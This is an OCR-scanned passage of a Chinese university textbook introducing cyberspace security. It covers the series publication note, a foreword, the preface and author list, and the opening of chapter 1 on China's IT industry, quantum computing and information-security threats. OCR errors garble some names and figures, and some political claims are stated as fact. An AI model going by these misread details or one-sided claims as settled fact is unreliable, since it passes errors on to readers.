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出 版 说 明 一 


21 世纪 是 信息 时 代 , 信 息 已 成 为 社会 发 展 的 重要 战略 资源 ,社会 的 信息 
化 已 成 为 当今 世界 发 展 的 潮流 和 核心 ,而 信息 安全 在 信息 社会 中 将 扮演 极为 
重要 的 角色 , 它 会 直接 关系 到 国家 安全 .企业 经营 和 人 们 的 日 常生 活 。 随 着 
信息 安全 产业 的 快速 发 展 , 全 球 对 信息 安全 人 才 的 需求 量 不 断 增 加 ,但 我 国 
目前 信息 安全 人 才 极 度 匮乏 , 远 远 不 能 满足 金融 、 商 业 、 公 安 、 军 事 和 政府 等 
部 门 的 需求 。 要 解决 供需 矛盾 ,必须 加 快 信息 安全 人 才 的 培养 ,以 满足 社会 
对 信息 安全 人 才 的 需求 。 为 此 ,教育 部 继 2001 年 批准 在 武汉 大 学 开设 信息 
安全 本 科 专 业 之 后 ,又 批准 了 多 所 高 等 院 校 设 立信 息 安 全 本 科 专 业 ,而且 许 
多 高 校 和 科研 院 所 已 设立 了 信息 安全 方向 的 具有 硕士 和 博士 学 位 授予 权 的 
学 科 点 。 

信息 安全 是 计算 机 、 通 信 、 物 理 、 数 学 等 领域 的 交叉 学 科 , 对 于 这 一 新 兴 
学 科 的 培养 模式 和 课程 设置 ,各 高 校 普遍 缺乏 经 验 ,因此 中 国 计 算 机 学 会 教 
育 专 业 委员 会 和 清华 大 学 出 版 社 联合 主办 了 “信息 安全 专业 教育 教学 研讨 
会 "等 一 系列 研讨 活动 ,并 成 立 了 “高 等 院 校 信息 安全 专业 系列 教材 "编审 委员 
会 ,由 我 国信 息 安 全 领域 著名 专家 肖 国 镇 教授 担任 编 委 会 主任 ,指导 “高 等 院 校 
信息 安全 专业 系列 教材 ”的 编写 工作 。 编 委 会 本 着 研究 先行 的 指导 原则 ,认真 
研讨 国内 外 高 等 院 校 信息 安全 专业 的 教学 体系 和 课程 设置 ,进行 了 大 量具 有 前 
脆性 的 研究 工作 ,而且 这 种 研究 工作 将 随 着 我 国信 息 安 全 专业 的 发 展 不 断 深 
人 。 系 列 教材 的 作者 都 是 既 在 本 专业 领域 有 深厚 的 学 术 造 诺 , 又 在 教学 第 一 线 
有 丰富 的 教学 经 验 的 学 者 、 专 家 。 

该 系列 教材 是 我 国 第 一 套 专门 针对 信息 安全 专业 的 教材 ,其 特点 是 : 

(D 体系 完整 结构 合理 、 内 容 先进 。 

@ 适应 面 广 : 能 够 满足 信息 安全 、 计 算 机 、 通 信 工 程 等 相关 专业 对 信息 
安全 领域 课程 的 教材 要 求 。 

C) 立体 配套 : 除 主教 材 外 ,还 配 有 多 媒体 电子 教案 .习题 与 实验 指导 等 。 

CD 版 本 更 新 及 时 , 紧 跟 科学 技术 的 新 发 展 。 

在 全 力 做 好 本 版 教材 ,满足 学 生 用 书 的 基础 上 ,还 经 由 专家 的 推荐 和 审 
定 , 遗 选 了 一 批 国外 信息 安全 领域 优秀 的 教材 加 入 系列 教材 中 ,以 进一步 满 
足 大 家 对 外 版 书 的 需求 。“ 高 等 院 校 信息 安全 专业 系列 教材 ”已 于 2006 年 年 
初 正 式 列 入 普通 高 等 教育 “十 一 五 ”国家 级 教材 规划 。 

2007 年 6 月 ,教育 部 高 等 学 校 信息 安全 类 专业 教学 指导 委员 会 成 立 大 会 
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又 第 一 次 会 议 在 北京 胜利 召开 。 本 次 会 议 由 教育 部 高 等 学 校 信息 安全 类 专业 教学 指导 委 
员 会 主任 单位 北京 工业 大 学 和 北京 电子 科技 学 院 主 办 ,清华 大 学 出 版 社 协 办 。 教 育 部 高 
等 学 校 信 息 安全 类 专业 教学 指导 委员 会 的 成 立 对 我 国信 息 安 全 专业 的 发 展 起 到 重要 的 指 
ei 2006 年 ,教育 部 给 武汉 大 学 下 达 了 “信息 安全 专业 指导 性 专业 规范 研制 ” 
学 科研 项 目 。2007 年 起 ,该 项 目 由 教育 部 高 等 学 校 信息 安全 类 专业 教学 指导 委员 会 
pe 在 高 教 司 和 教 指 委 的 指导 下 ,项 目 组 团结 一 致 ,努力 工作 ,克服 困难 ,历时 5 
年 ,制定 出 我 国 第 一 个 信息 安全 专业 指导 性 专业 规范 ,于 2012 年 年 底 通 过 经 教育 部 高 等 
教育 司 理工 科教 育 处 授权 组 织 的 专家 组 评审 ,并 且 已 经 得 到 武汉 大 学 等 许多 高 校 的 实际 
使 用 。2013 年 ,新 一 届 教 育 部 高 等 学 校 信息 安全 专业 教学 指导 委员 会 成 立 。 经 组 织 审查 
和 研究 决定 ,2014 年 ,以 教育 部 高 等 学 校 信息 安全 专业 教学 指导 委员 会 的 名 义 正 式 发 布 
高 等 学 校 信息 安全 专业 指导 性 专业 规范 》( 由 清华 大 学 出 版 社 正式 出 版 )。 
2015 年 6 H ,国务院 学 位 委员 会 .教育 部 出 台 增 设 “ 网 络 空间 安全 ”为 一 级 学 科 的 决 
定 , 将 高 校 培养 网 络 空间 安全 人 才 提 到 新 的 高 度 。2016 年 6 月 ,中 央 网 络 安全 和 信息 化 
领导 小 组 办 公 室 (下 文 简称 "中 央 网 信 办 ”) 、 国 家 发 展 和 改革 委员 会 .教育 部 、 科 学 技术 部 、 
工业 和 信息 化 部 及 人 力 资 源 和 社会 保障 部 六 大 部 门 联合 发 布 (关于 加 强 网 络 安全 学 科 建 
设 和 人 才 培 养 的 意见 》( 中 网 办 发 文 C2016]4 号 )。2019 年 6 月 ,教育 部 高 等 学 校 网 络 空间 
tae 召开 成 立 大 会 。 为 贯彻 落实 (关于 加 强 网 络 安全 学 科 建 设 和 人 
才 培 养 的 意见 》, 进 一 步 深化 高 等 教育 教学 改革 ,促进 网 络 安全 学 科 专 业 建 设 和 人 才 培 养 ， 
sse 心 课程 和 教材 建设 ,在 教育 部 高 等 学 校 网 络 空间 安全 专业 教学 
指导 委员 会 和 中 央 网 信 办 组 织 的 “网 络 空间 安全 教材 体系 建设 研究 "课题 组 的 指导 下 , 启 
动 了 “网 络 空间 安全 重点 规划 丛书 ”的 工作 ,由 教育 部 高 等 学 校 网 络 空间 安全 专业 教学 指 
导 委 员 会 秘书 长 封 化 民 教授 担任 编 委 会 主任 。 本 规划 丛书 基于 "高 等 院 校 信息 安全 专业 
系列 教材 ”坚实 的 工作 基础 和 成 果 、 阵 容 强 大 的 编审 委员 会 和 优秀 的 作者 队伍 ,目前 已 有 
多 部 图 书 获得 中 央 网 信 办 与 教育 部 指导 和 组 织 评 选 的 “网 络 安全 优秀 教材 奖 ”, 以 及 “普通 
高 等 教育 本 科 国 家 级 规划 教材 “普通 高 等 教育 精品 教材 “中 国 大 学 出 版 社 图 书 奖 ” 等 多 
个 奖项 。 
“网 络 空间 安全 重点 规划 从 书 ” 将 根据 (高 等 学 校 信息 安全 专业 指导 性 专业 规范 》( 及 
后 续 版 本 ) 和 相关 教材 建设 课题 组 的 研究 成 果 不 断 更 新 和 扩展 ,进一步 体现 科学 性 、 系 统 
性 和 新 颖 性 ,及 时 反映 教学 改革 和 课程 建设 的 新 成 果 ,并 随 着 我 国 网 络 空间 安全 学 科 的 发 
展 不 断 完 善 ,力争 为 我 国 网 络 空间 安全 相关 学 科 专 业 的 本 科 和 研究 生 教材 建设 .学 术 出 版 
与 人 才 培 养 做 出 更 大 的 贡献 
我 们 的 E-mail 地 址 是 : zhangm@tup.tsinghua.edu.cn, 联 系 人 : 张 民 。 
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2014 年 2 月 27 日 ,习近平 总 书记 在 中 央 网 络 安全 和 信息 化 领导 小 组 第 
一 次 会 议 上 指出 “没有 网 络 安全 就 没有 国家 安全 ,没有 信息 化 就 没有 现代 
化 ”。 为 实施 网 络 强国 战略 ,加 快 网 络 空间 安全 高 层次 人 才 培 养 ,2015 年 6 
月 ,国务院 学 位 委员 会 教育 部 共同 发 布 了 “国务 院 学 位 委员 会 教育 部 关于 
增设 网 络 空间 安全 一 级 学 科 的 通知 ”。 全 国 许多 高 校 相继 成 立 了 网 络 空 间 安 
全 学 院 。2016 年 4 月 19 日 ,习近平 总 书记 在 网 络 安全 和 信息 化 工作 座谈 会 
上 的 讲话 中 指出 "培养 网 信人 才 , 要 下 大 功夫 .下 大 本 钱 , 请 优秀 的 老师 , 编 
优秀 的 教材 , 招 优秀 的 学 生 , 建 一 流 的 网 络 空 间 安全 学 院 。” 

目前 ,全 国 已 有 36 所 高 校 获得 网 络 空间 安全 一 级 学 科 博 士 学 位 授权 点 
资格 ,53 所 高 校 设立 了 网 络 空间 安全 专业 。 为 满足 网 络 空间 安全 人 才 培 养 
的 需求 ,急需 建立 适应 本 学 科 建 设 与 发 展 的 教材 体系 ,编写 出 版 一 批 高 水 平 
的 网 络 空间 安全 教材 。 近 年 来 ,我 作为 主持 人 承担 了 中 央 网 络 安全 和 信息 化 
委员 会 办 公 室 (以 下 简称 “中 央 网 信 办 ”) 组 织 的 课题 一 一 “网 络 空间 安全 教材 
编写 指南 的 研究 和 制定 “网 络 空间 安全 教材 体系 建设 研究 “网 络 安全 本 科 
生 及 研究 生 培 养 课程 体 系 研究 ”,《 网 络 空间 安全 导论 ) 一 书 的 主编 和 副 主编 
均 参 与 了 以 上 课题 的 研究 工作 。 

在 网 络 空 间 安全 教材 体系 建设 规划 中 ,《 网 络 空 间 安 全 导论 ) 被 列 为 本 科 
生 的 核心 通 识 课 教材 。 该 书 作 者 依据 教材 体系 中 制定 的 “网 络 空间 安全 导 
论 ”" 大 纲 和 教育 部 高 等 学 校 相关 专业 规范 和 质量 标准 安排 教材 内 容 的 组 织 。 
该 书 的 出 版 可 以 满足 各 高 校 网 络 空间 安全 、 信 息 安全 等 相关 专业 的 教学 需 
求 ,对 提高 网 络 空间 安全 人 才 培 养 质量 将 起 到 重要 作用 。 

该 书 的 6 位 作者 均 坚 守 高 校 的 教学 和 科研 一 线 工作 多 年 ,在 长 期 的 网 络 
空间 安全 教学 工作 中 积累 了 丰富 的 经 验 , 多 位 作者 还 获得 了 中 央 网 信 办 与 教 
育 部 指导 和 组 织 评 选 的 网 络 安全 优秀 教师 奖 和 网 络 安 全 优秀 教材 奖 , 以 及 北 
京 市 教学 名 师 .陕西 省 教学 名 师 等 荣誉 称号 。 在 该 书 的 编写 工作 中 ,6 位 作 
者 充分 发 挥 了 各 自 的 专业 特长 ,将 他 们 在 日 常 教学 中 积累 的 教学 经 验 、 教 育 
理念 和 科研 成 果 等 有 效 地 融入 教材 。 

《网 络 空间 安全 导论 ) 的 内 容 涵盖 了 密码 学 及 应 用 、 网 络 安全 、 系 统 安全 、 
网 络 空 间 安 全 基础 理论 和 应 用 安全 等 五 个 相互 关联 的 研究 方向 。 全 书 内 容 
全 面 ,概念 清晰 ,图 文 并 茂 , 深 入 浅 出 。 特 别 是 ,该 书 以 新 媒体 的 形式 出 版 , 增 
加 了 作者 精心 制作 的 微 课 视 频 , 更 加 方便 读者 学 习 、 理 解 和 掌握 书 中 涉及 的 


网 络 空间 安全 导论 。 
各 个 知识 点 。 总 之 ,该 书 是 一 本 优秀 的 通 识 课 教材 ,非常 适合 网 络 空间 安全 、 信 息 安全 等 
相关 专业 的 广大 师 生 和 科研 工作 者 阅读 和 学 习 。 


鉴于 以 上 原因 ,我 特别 愿意 将 (网 络 空间 安全 导论 ?推荐 给 广大 读者 。 最 后 ,还 要 感谢 
各 位 作者 和 编审 为 此 书 的 出 版 发 行 工作 所 付出 的 艰辛 和 努力 。 和 希望 (网 络 空间 安全 导论 》 
与 时 俱 进 ,不 断 更 新 ,为 网 络 空间 安全 相关 人 才 的 培养 做 出 更 大 的 贡献 。 
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为 了 加 强 网 络 空间 安全 专业 人 才 的 培养 ,国务 院 学 位 委 会 员 .教育 部 于 
2015 年 6 月 出 台 增 设 * 网 络 空间 安全 "为 一 级 学 科 的 决定 。 全 国 许 多 高 校 相 
继 成 立 了 网 络 空间 安全 学 院 , 培 养 网 络 空间 安全 学 科研 究 生 ,也 有 许多 高 校 
设立 信息 安全 ,网 络 空间 安全 或 信息 对 抗 技术 等 专业 培养 本 科 生 。 在 许多 高 
校 的 网 络 空 间 安 全 类 专业 培养 方案 中 , 均 将 “网 络 空间 安全 导论 ”课程 设 为 低 
年 级 本 科 生 的 核心 通 识 课 。 为 了 满足 网 络 空间 安全 人 才 培 养 的 需求 ,本 书 作 
者 经 研究 决定 发 挥 各 自 专 业 特长 ,编写 一 本 适合 本 科 通 识 课 教学 的 (网 络 空 
间 安 全 导论 》。 

本 书 作者 均 为 教育 部 高 等 学 校 网 络 空 间 安 全 专业 教学 指导 委员 会 委员 ， 
部 分 作者 同时 也 是 中 国 密 码 学 会 理事 ,主持 或 参与 了 教育 部 “高 等 理工 教育 
教学 改革 与 实践 项 目 ” 一 一 (高 等 学 校 信息 安全 专业 指导 性 专业 规范 》) 和 《高 
等 学 校 网 络 空间 安全 专业 指导 性 专业 规范 》 的 编制 工作 。 此 外 ,作者 还 参与 
了 由 王小云 院士 主持 、. 中 共 中 央 网 络 安 全 和 信息 化 委员 会 办 公 室 指 导 和 组 织 
的 系列 课题 一 一 "网络 空间 安全 教材 编写 指南 的 研究 和 制定 ”网络 空间 安全 
教材 体系 建设 研究 “网 络 安 全 本 科 生 及 研究 生 培 养 课程 体系 研究 ”"。 在 本 书 
的 编写 过 程 中 ,作者 充分 汲取 了 上 述 研 究 成 果 , 力 求 使 本 教材 的 编写 大 岗 符 
合 上 述 专 业 规范 .教材 编写 指南 和 教材 体系 建设 方案 的 要 求 。 

本 书 主要 有 以 下 特色 : 

CD 基本 概念 清晰 ,深入 浅 出。 在 基本 概念 的 阐述 上 ,力求 准确 精练 ;在 
语言 的 运用 上 ,力求 顺畅 自然 。 作 者 尽量 避免 使 用 上 涩 难 懂 的 语言 描述 深奥 
的 理论 和 技术 知识 ,而 是 借助 大 量 的 图 表 进 行 阐述 。 

(2) 内 容 全 面 ,分 别 曾 述 了 网 络 空间 安全 学 科 简 介 、 密 码 学 、 网 络 安全 、 
系统 安全 、 内 容 安 全 和 应 用 安全 等 基础 知识 ,涵盖 网 络 空间 安全 导论 课程 必 

(3) 本 书 以 新 媒体 的 形式 出 版 ,读者 可 以 通过 手机 扫描 每 小 节 的 二 维 
码 , 观 看 由 作者 精心 制作 的 、 讲 解 本 节 知 识 的 微 课 视 频 。 

(4) 每 章 后 面 都 附 有 精心 其 酌 和 编排 的 思考 题 。 通 过 深入 分 析 和 讨论 
这 些 思考 题 ,读者 可 加 强 对 每 章 所 学 内 容 的 理解 。 

(5) 书 中 列 出 了 参考 文献 ,为 网 络 空间 安全 相关 专业 的 本 科 生 继续 深入 
学 习 相 关 知 识 提 供 了 参考 资料 。 

本 书 由 刘 建 伟 任 主编 , 石 文昌 、 李 建华 、 李 晖 、 张 焕 国 、 杜 瑞 颖 任 副 主编 ， 
封 化 民 教 授 任 主 审 。 中 国 科 学 院 王 小 云 院士 特 为 本 书 作 序 。 


m 网 络 空间 安全 导论 


全 书 共 分 6 章 ,每 章 授课 4 学 时 ,全 部 授课 内 容 按 24 学 时 设计 。 

* 第 1 章 为 网 络 空间 安全 概述 ,由 武汉 大 学 张 焕 国 教授 和 杜 瑞 颖 教授 主笔 。 

。 第 2 章 为 密码 学 基础 ,由 北京 航空 航天 大 学 刘 建 伟 教授 主笔 。 

。 第 3 章 为 网 络 安全 基础 ,由 北京 航空 航天 大 学 刘 建 伟 教授 主笔 。 

。 第 4 章 为 系统 安全 基础 ,由 中 国人 民 大 学 石 文昌 教授 主笔 。 

。 第 5 章 为 内 容 安 全 基础 ,由 上 海 交通 大 学 李建华 教授 主笔 。 

。 第 6 章 为 应 用 安全 基础 ,由 西安 电子 科技 大 学 李 晖 教授 主笔 。 

在 本 书 的 编写 过 程 中 ,还 邀请 了 国内 高 校 优秀 的 青年 学 者 和 知名 网 络 安全 专家 参与 
编写 了 部 分 章节 的 内 容 , 他 们 分 别 是 : 

。 融 勇 ,陕西 师范 大 学 教授 ,承担 了 2.2.3 小 节 、2.2.4 小 节 和 2.3 节 的 编写 任务 。 

。 张 红旗 ,战略 支援 部 队 信息 工程 大 学 教授 ,承担 了 2.4 节 的 编写 任务 。 

， 左 晓 栋 , 中 国信 息 安全 研究 院 副 院 长 ,承担 了 3.3 节 的 编写 任务 。 

。 黄 欣 沂 ,福建 师范 大 学 教授 ,承担 了 3.4 节 的 编写 任务 。 

在 本 书 的 编写 过 程 中 ,作者 还 邀请 了 360 公司 计算 机 病毒 专家 徐 传 宇 先生 编写 了 有 
关 计算 机 病毒 防护 技术 的 3.2.4 小 节 , 邀 请 北京 神州 绿 盟 科技 有 限 公司 研 发 总 监 攀 志 甲 
先生 编写 了 有 关 安 全 漏洞 扫描 技术 的 3.2.5 小 节 。 

感谢 中 国电 子 学 会 和 中 国 通信 学 会 会 士 \ 中 国 密码 学 会 终生 成 就 奖 获得 者 、 著 名 密码 
学 家 和 信息 论 学 家 王 育 民 教授 。 在 本 书 2.1.4 小 节 的 编写 中 ,作者 参考 了 王 育 民 教 授 提 
供 的 未 公开 发 表 的 手稿 。 

感谢 北京 航空 航天 大 学 网 络 空 间 安 全 学 院 的 李 大 伟 老师 、 孙 钰 副教授 、 崔 剑 老 师 ， 
Wollongong 大 学 的 李 艳 楠 博士 ,陕西 师范 大 学 的 刘 金 会 副教授 . 赵 艳 琦 博士 . 史 售 彬 博 
士 \ 陈 若 楠 硕士 、 严 都 力 硕士 ,他 们 在 本 书 的 微 视频 制作 、 图 表 整 理 , 参 考 文献 整理 等 方面 
提供 了 大 力 支持 与 帮助 。 

感谢 上 海 交通 大 学 的 潘 倩 倩 博士 、 伍 军 教授 .吴鹏 老师 、 林 祥 老师 ,他 们 在 本 书 内 容 安 
全 管理 部 分 的 信息 内 容 网 络 、. 社 交 网 络 信息 内 容 与 大 数据 .与 情 内 容 分 析 等 章节 的 撰写 、 
图 表 整 理 、 参 考 文献 整理 等 方面 提供 了 大 力 支 持 与 帮助 。 

感谢 西安 电子 科技 大 学 网 络 与 信息 安全 学 院 的 朱 辉 教授 . 尹 钰 副 研究 员 、 净 浩 楠 博 
士 \ 王 灿 硕 士 , 他 们 在 本 书 的 微 视频 制作 、 图 表 整 理 , 参 考 文献 整理 等 方面 提供 了 大 力 支 持 
与 帮助 。 

感谢 清华 大 学 出 版 社 的 张 民 编审 在 本 书 的 策划 、 组 织 和 撰写 过 程 中 给 予 的 指导 和 帮 
助 , 她 为 提高 本 书 的 质量 提出 了 许多 宝贵 的 指导 性 建议 。 

在 此 ,作者 向 所 有 参与 本 书 编写 工作 的 各 位 学 者 和 专家 一 并 表示 衷心 的 感谢 。 

本 书 可 作为 密码 学 、 信 息 安全 、 网 络 空间 安全 ,信息 对 抗 技术 等 专业 的 本 科 生 教材 ,也 
可 以 作为 网 络 安全 工程 师 的 参考 书 和 培训 教材 。 
由 于 作者 水 平 所 限 ,加 之 编写 时 间 仓促 , 书 中 难免 会 存在 错误 和 不 妥 之 处 。 敬 请 广大 


读者 朋友 批评 指正 。 


2020 年 6 月 14 日 于 北京 
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随 着 信息 技术 和 产业 的 高 速 发 展 和 广泛 应 用 ,人 类 社会 进入 信息 化 时 代 , 信 息 安 全 已 
成 为 影响 国家 经 济 社会 发 展 的 关键 问题 之 一 。 社 会 迫切 需要 大 量 的 信息 安全 专业 人 才 。 

2001 年 ,武汉 大 学 建立 了 我 国 第 一 个 信息 安全 本 科 专 业 。2015 年 6 月 ,国务 院 学 位 
委员 会 和 教育 部 出 台 增设 “网 络 空间 安全 "为 一 级 学 科 的 决定 。 

什么 是 网 络 空间 ? 为 什么 网 络 空间 存在 严重 的 信息 安全 问题 ?什么 是 网 络 空间 安全 
学 科 ? 我 国有 哪些 涉及 网 络 与 信息 安全 的 法 律 法 规 和 技术 标准 ?要 办 好 网 络 空间 安全 学 
科 , 要 培养 优秀 的 网 络 空间 安全 专业 人 才 ,就 必须 首先 搞 清楚 这 几 个 基本 问题 。 

本 章 介绍 网 络 空间 .网络 空间 安全 和 网 络 空间 安全 学 科 的 基本 概念 ,介绍 我 国 现行 的 
主要 网 络 与 信息 安全 法 律 法 规 和 信息 安全 技术 标准 。 正 确 理解 和 掌握 这 些 问 题 ,不 仅 对 
我 国 网 络 空间 安全 学 科 建 设 和 人 才 培 养 具有 十 分 重要 的 指导 意义 ,而 且 对 我 国 网 络 空间 
安全 领域 的 科学 研究 和 产业 发 展 也 具有 十 分 重要 的 指导 意义 。 


1.1 ”信息 时 代 与 信息 安全 


人 类 社会 在 经 历 了 机 械 化 .电气 化 之 后 ,进入 了 一 个 绒 新 的 信息 化 时 代 。 在 信息 时 
代 , 电 子 信息 产业 成 为 世界 第 一 大 产业 。 信 息 就 像 水 、 电 石油 一 样 ,与 所 有 行业 和 所 有 人 
都 相关 ,成 为 一 种 基础 资源 。 信 息 和 信息 技术 改变 着 人 们 的 生活 和 工作 方式 。 离 开 计算 
机 、 网 络 、 电 视 和 手机 等 电子 信息 设备 ,人 们 将 无 法 正常 生活 和 工作 。 因 此 可 以 说 ,在 信息 
时 代 人 们 生存 在 物理 世界 、 人 类 社会 和 信息 空间 组 成 的 三 元 世界 中 。 


1.1.1 信息 技术 与 产业 空前 繁荣 


1. 我 国 已 经 成 为 信息 技术 与 产业 大 国 

我 国 已 经 成 为 信息 技术 与 产业 大 国 , 正 逐步 成 为 世界 信息 技术 与 产业 强国 。 目 前 ,大 
多 数 的 中 低档 电子 信息 产品 的 产量 和 拥有 量 ,我 国都 是 世界 第 一 。 部 分 高 端 电子 信息 产 
品 的 产量 和 拥有 量 ,我 国 也 处 于 世界 领先 水 平 。 

早 在 2001 年 ,我 国 的 手机 拥有 量 就 超过 美国 ,达到 1.2 亿 部 , 居 世 界 第 一 。2018 年 ， 
美国 打压 中 国 华为 。2019 年 ,华为 的 业务 不 降 反 升 . 仅 上 半年 ,华为 公司 的 产值 就 超过 
4000 亿 元 ,生产 销售 手机 1.1 亿 部 , 比 2018 年 同期 增长 24%。 我 国 的 手机 拥有 量 更 是 超 
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过 了 6 亿 部 , 稳 居 世 界 第 一 。 

2019 年 ,我 国 网 民 规 模 数 量 达到 8.29 亿 , 居 世界 第 一 。 

我 国电 视 机 用 户 数 在 2015 年 就 达到 3 亿 户 ,电视 观众 数 超过 10 亿 人 , 居 世 界 第 一 。 

我 国 的 计算 机 产量 和 拥有 量 都 是 世界 第 一 。2016 年 ,我 国生 产 331 443 000 台 计 算 
机 ,2017 年 上 半年 生产 193 281 000 台 计 算 机 。 我 国生 产 了 世界 70% 以 上 的 计算 机 ,但 是 
由 于 CPU 等 核心 芯片 和 操作 系统 等 基础 软件 采用 国外 产品 ,使 得 我 国 只 占有 其 中 17% 
的 利润 ,83% 的 利润 是 国外 的 。 

世界 排名 前 十 的 互联 网 企业 ,我 国 的 企业 占 四 家 (阿里 、 腾 讯 、 百 度 和 京东 ), 中 国电 
信 、 中 国 移动 .华为 .联想 和 小 米 等 企业 成 为 世界 五 百 强 企业 。 华 为 的 年 产值 已 超过 了 
7000 亿 元 ,超过 了 许多 中 小 城市 。 


我 国 的 超级 计算 机 技术 居 世 界 领 先 水 

平 ,超级 计算 机 荣 登 世界 第 一 的 次 数 居 世 界 

第 一 。2009 年 1 月 8 日 ,国防 科学 技术 大 学 

研制 出 "天河 一 号 ”超级 计算 机 ,运算 速度 居 

世界 第 一 ,如 图 1-1 所 示 。2013 年 ,国防 科学 

技术 大 学 研制 出 “天河 二 号 ”, 运 算 速度 居 世 界 

第 一 ,并 且 连 续 6 次 获得 世界 第 一 ,如 图 1-2 所 

示 。2016 年 6 月 21 日 ,中 国 * 神 威 太湖 之 光 ” 

超级 计算 机 成 为 世界 第 一 ,并 且 其 CPU AE 

图 1-1 “天 河 一 号 "超级 计算 机 系统 、 互 联网 络 等 核心 部 件 完全 国产 ,如 图 1-3 

所 示 。2018 年 5 月 ,“ 天 河 三 号 ”原型 机 首次 

亮相 ,这 是 世界 首 台 百 亿 亿 次 超级 计算 机 ,“ 天 河 三 号 ”的 运算 能 力 是 "天 河 二 号 ”的 20 倍 ， 
是 “天 河 一 号 ”的 200 fi. 


1-2 “天 河 二 号 ?超级 计算 机 图 1-3 “神威 太湖 之 光 " 超 级 计算 机 


2018 4E 8 H 28 日 ,中 国 科 学 院 宣布 中 国 已 经 研制 出 超 导 集 成 电路 ,并 完成 测试 以 及 
超 导 计 算 机 体系 结构 设计 。 中 国 的 超 导 计算 机 的 运行 速度 是 目前 超级 计算 机 的 154 倍 ， 
并 且 更 节能 。 超 导 现 象 是 某 些 材料 在 一 定 的 低温 环境 下 ,其 电阻 接近 于 0, 从 而 具有 超 强 
的 导电 能 力 。 利 用 超 导 材 料 制 成 集成 电路 、 计 算 机 ,可 以 节约 大 量 的 电能 。 超 导 计算 机 的 
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能 耗 与 传统 超级 计算 机 相 比 ,将 下 降 到 千 分 之 一 。 
在 通信 领域, 我国 华为 公司 在 5G 技术 方面 独占 世界 鳌头 ,而 且 在 算法 芯片 ,操作 系 
统 等 核心 技术 方面 拥有 自主 知识 产权 ,引领 世界 5G 技术 发 展 。 


2. 量子 信息 技术 高 速 发 展 

量子 信息 技术 高 速 发 展 ,推动 了 量子 计算 机 、 量 子 通信 和 量子 密码 的 发 展 。 

2007 年 2 月 ,加 拿 大 D-Wave System 公司 研制 出 世界 上 第 一 台 商 用 16 位 的 量子 计 
算 机 。2008 年 5 月 提高 到 48 位 。2011 年 5 月 提高 到 128 位 ,每 台 售 价 1000 万 美元 ,被 
美国 洛克 希 德 。 马丁 公司 购买 ,用 于 分 析 F35 战机 事故 和 研制 新 式 武 器 。2013 年 初 又 提 
高 到 512 位 ,每 台 售 价 1500 万 美元 ,被 美国 谷歌 公司 购买 ,用 于 研究 人 工 智能 和 提高 信息 
搜索 速度 。2015 年 8 月 进一步 提高 到 1152 位 ,被 美国 LOS Alamos 实验 室 购买 ,如 图 1-4 
所 示 。 


图 1-4 ”加拿大 D-Wave System 的 1152 位 量子 计算 机 


应 当 指 出 : 加 拿 大 的 量子 计算 机 是 专用 型 量子 计算 机 ,不 是 通用 型 量子 计算 机 。 因 
此 ,有 些 计 算 工作 能 够 完成 ,有 些 计 算 工 作 不 能 够 完成 。 

早 在 2001 年 ,IBM 公司 就 研制 出 世界 上 第 
一 台 7 位 的 示例 型 量子 计算 机 ,向 世界 证 明了 量 
子 计算 机 在 理论 上 的 正确 性 和 技术 上 的 可 行 性 。 
2011 年 9 月 ,美国 加 州 大 学 圣 芭 芭 拉 分 校 
(UCSB) 研 制 出 9 位 的 冯 “， 诺 依 曼 体系 结构 量子 
计算 机 。2017 年 底 ,IBM 公司 宣称 已 成 功 研制 出 
50 位 的 量子 计算 机 ,如 图 1-5 所 示 。 此 外 , 英 特 
尔 、 微 软 , 谷 歌 等 公司 也 都 在 研制 自己 的 量子 计算 
机 。 需 要 指出 : 美国 的 量子 计算 机 是 通用 型 量子 1-5 美国 IBM 的 50 位 量子 计算 机 
计算 机 。 

我 国 的 量子 信息 技术 在 一 些 领域 居 世 界 领先 水 平 。 早 在 2009 年 ,量子 密 钥 分 发 技术 
就 已 经 在 安徽 芜湖 电子 政务 系统 中 得 到 实际 应 用 。2016 年 8 月 ,我 国 发 射 了 世界 第 一 颗 
量子 科学 实验 卫星 “黑子 号 ”。2017 年 ,中 国 科 学 技术 大 学 研制 出 10 个 光量 子 的 量子 计 
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算 机 ,计算 能 力 超过 以 前 的 同类 量子 计算 机 ,如 图 1-6 所 示 。 


2 xS 、 


图 1-6 ”中国 科 学 技术 大 学 的 10 位 量子 计算 机 


1.1.2 ”信息 安全 形势 严峻 


当前 ,一 方面 是 信息 技术 与 产业 的 空前 繁荣 , 另 一 方面 是 危害 信息 安全 的 事件 不 断 发 
生 。 敌 对 势力 的 破坏 、 黑 客 攻击 、 病 毒 人 侵 、 利 用 计算 机 犯罪 .网 络 上 的 有 害 内 容 泛 滥 、 隐 
私 泄露 等 事件 ,对 信息 安全 构成 了 极 大 威胁 ,信息 安全 的 形势 是 严峻 的 。 


1. 敌对 势力 的 破坏 

据 美 国 国 家 安全 局 (National Security Agency,.NSA) 前 雇员 爱德华 。 斯 诺 登 在 2013 
年 4 月 爆料 : 美国 国家 安全 局 针对 中 国 进 行 了 大 规模 的 网 络 攻击 ,并 把 商务 部 .外 交 部 、 
银行 ,电信 公司 、 华 为 公司 和 清华 大 学 等 作为 重点 目标 。 

2017 年 3 月 8 日 ,维基 解密 宣称 ,他 们 获得 了 几 千 份 美国 中 央 情报 局 (CIA) 在 
2013—2016 年 的 网 络 攻 击 活动 秘密 文件 。 这 些 文件 不 仅 显示 了 CIA 具有 网 络 攻击 的 巨 
大 能 力 , 拥 有 庞大 的 黑客 攻击 武器 库 , 而 且 还 说 明 CIA 能 够 攻击 基于 Windows、Android、 
iOS、OS X,Linux 的 各 种 信息 系统 ,包括 计算 机 、 路 由 器 .手机 、 车 载 系统 和 家 用 电器 等 。 

这 些 事实 说 明 ,美国 已 经 成 为 世界 网 络 和 信息 安全 最 大 的 威胁 ! 2018 年 以 来 ,美国 
对 我 国 实施 贸易 制裁 和 科技 封锁 ,其 根本 目的 是 要 阻止 中 国 的 现代 化 发 展 ,维持 其 “一 国 
独霸 ”的 霸主 地 位 。 

从 中 华人 民 共 和 国 成 立 到 如 今 , 我 国 已 经 成 功 战 胜 了 多 次 国外 对 我 们 的 封锁 。 例 如 ， 
在 20 世纪 的 50 一 70 年 代 , 我 国 战胜 了 以 美国 为 首 的 西方 世界 的 封锁 ,建立 了 独立 自主 的 
经 济 体系 。 在 20 世纪 的 60 年 代 , 我 国 战胜 了 苏联 的 技术 封锁 ,独立 自主 地 研制 出 “两 弹 
一 星 ”, 粉 碎 了 国外 对 我 国 的 核 率 诈 。 

我 们 的 国家 早已 今 非 萌 比 ,美国 的 封锁 只 会 给 我 们 制造 一 些 困 难 , 不 可 能 阻止 我 国 胜 
